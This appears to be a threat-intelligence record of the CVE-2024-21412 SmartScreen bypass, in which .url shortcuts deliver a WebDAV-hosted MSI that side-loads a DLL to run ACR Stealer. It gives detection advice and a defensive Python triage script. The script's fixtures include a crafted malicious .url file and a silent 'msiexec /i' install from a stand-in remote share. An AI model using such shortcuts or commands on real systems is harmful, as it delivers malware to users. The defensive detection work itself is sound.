Bypass Record

DLL Side-Loading × Microsoft Defender SmartScreen

A publicly-reported instance of DLL Side-Loading bypassing Microsoft Defender SmartScreen, recorded with its original source. Factual record; no assessment of any specific deployment.

Product
Microsoft Defender SmartScreen
Technique
DLL Side-Loading
MITRE ATT&CK
T1574.002
Confidence
High
Severity
Critical
Status
in the wild
Disclosed
2024-03-13
Config / version noted
Not stated

Provenance

Reported as

exploiting CVE-2024-21412 to bypass Microsoft Defender SmartScreen

Mechanism

The attack exploits CVE-2024-21412 (the Internet Shortcut Files Security Feature Bypass) by using internet shortcut (.url) files hosted on WebDAV shares. When a user clicks a phishing link, the .url file points to a malicious MSI installer on a remote server. SmartScreen fails to properly validate the source of the file, so no warning is raised and the MSI is allowed to execute. The MSI then performs DLL side-loading: it drops an executable alongside a malicious DLL that the executable loads by name, and that DLL decrypts and runs the ACR Stealer payload, which employs anti-analysis techniques such as XOR encoding and obfuscation.

Detection & mitigation

Monitor for msiexec.exe execution whose package argument is a UNC or WebDAV path (paths fetched through the Windows WebClient service appear as \\host@port\DavWWWRoot\... or \\host@SSL\...). Detect DLL side-loading with image-load telemetry (for example Sysmon event ID 7): an unsigned DLL loaded from a user-writable or otherwise non-standard directory, particularly one that sits beside the executable that loads it. Apply the CVE-2024-21412 patch and enforce SmartScreen via Group Policy so that users cannot turn it off.
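The following is an added example, not code from the cited report, that turns the mechanism and detection notes above into runnable triage logic: it parses a .url file and flags one whose target is a remote share or an executable/installer, then scans Sysmon-style process-creation and image-load records for an MSI launched from a WebDAV/UNC path and for an unsigned DLL loaded from a non-standard directory next to its host executable. The .url contents, the event records, the trusted-directory list and the extension list are all constructed assumptions for the demonstration.

```python
"""Triage helpers for the .url -> WebDAV MSI -> DLL side-loading chain.

Added example; the shortcut file, events and allow-lists below are constructed
for illustration and are not taken from the cited report.
"""
import ntpath
import re
from configparser import ConfigParser

# Directories where DLL loads are expected (assumption: a real deployment
# extends this with its own software install paths).
TRUSTED_DLL_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\windows\\winsxs\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Targets a mailed .url file should never point at (triage heuristic, assumed).
EXECUTABLE_TARGETS = (".msi", ".url", ".lnk", ".exe", ".hta", ".js", ".vbs")

# WebDAV Mini-Redirector and UNC artefacts inside a command line:
# \\host@80\..., \\host@SSL\..., DavWWWRoot, file://host/..., \\host\...
REMOTE_PATH_RE = re.compile(
    r"(\\\\[^\\]+@(ssl|\d+)\\|davwwwroot|file://[^/\s]+/|\\\\[a-z0-9.-]+\\)",
    re.I,
)

# Constructed .url file of the kind described in the Mechanism section.
SAMPLE_URL_FILE = (
    "[InternetShortcut]\n"
    "URL=file://203.0.113.5@80/DavWWWRoot/Invoice/Setup.msi\n"
    "ShowCommand=7\n"
    "IconIndex=13\n"
    "IconFile=C:\\Windows\\System32\\SHELL32.dll\n"
)

# Constructed Sysmon-like records: msiexec from a WebDAV path, a DLL loaded
# beside a dropped executable in %TEMP%, and two benign controls.
EVENTS = [
    {"type": "ProcessCreate", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "\\203.0.113.5@80\DavWWWRoot\Invoice\Setup.msi" /qn'},
    {"type": "ImageLoad", "Image": r"C:\Users\alice\AppData\Local\Temp\Updater\updater.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\Updater\version.dll", "Signed": False},
    {"type": "ImageLoad", "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": True},
    {"type": "ProcessCreate", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\7z.msi"'},
]


def shortcut_target(text):
    """Return the URL= value of an [InternetShortcut] file, or None."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


def shortcut_is_suspicious(text):
    """Flag a .url whose target is a remote share, or a web URL to an installer/script."""
    url = shortcut_target(text)
    if url is None:
        return False
    low = url.strip().lower()
    if low.startswith("file://") and not low.startswith("file:///"):
        return True  # file://host/... : a network share, not a local file
    if low.startswith("\\\\"):
        return True  # bare UNC path
    return low.startswith(("http://", "https://")) and low.endswith(EXECUTABLE_TARGETS)


def dll_load_is_sideload(ev):
    """Unsigned DLL, outside trusted directories, in the same directory as its host EXE."""
    dll = ev["ImageLoaded"].lower()
    if ev.get("Signed") or dll.startswith(TRUSTED_DLL_DIRS):
        return False
    return ntpath.dirname(dll) == ntpath.dirname(ev["Image"].lower())


def scan(events):
    """Return (rule, evidence) pairs for the two detections in the record."""
    findings = []
    for ev in events:
        if (ev["type"] == "ProcessCreate"
                and ev["Image"].lower().endswith("\\msiexec.exe")
                and REMOTE_PATH_RE.search(ev["CommandLine"])):
            findings.append(("msi_from_remote_share", ev["CommandLine"]))
        elif ev["type"] == "ImageLoad" and dll_load_is_sideload(ev):
            findings.append(("dll_sideload_candidate", ev["ImageLoaded"]))
    return findings


if __name__ == "__main__":
    print("suspicious .url:", shortcut_is_suspicious(SAMPLE_URL_FILE))
    for rule, evidence in scan(EVENTS):
        print(rule, "->", evidence)
```

The DLL rule deliberately requires the DLL to sit beside its loading executable; that is the layout an MSI produces when it drops a host binary and its planted DLL into the same folder, and it keeps the rule quiet on ordinary third-party installs under Program Files. Loosen the same-directory test if you also want to catch search-order hijacks from unrelated writable paths.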


This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.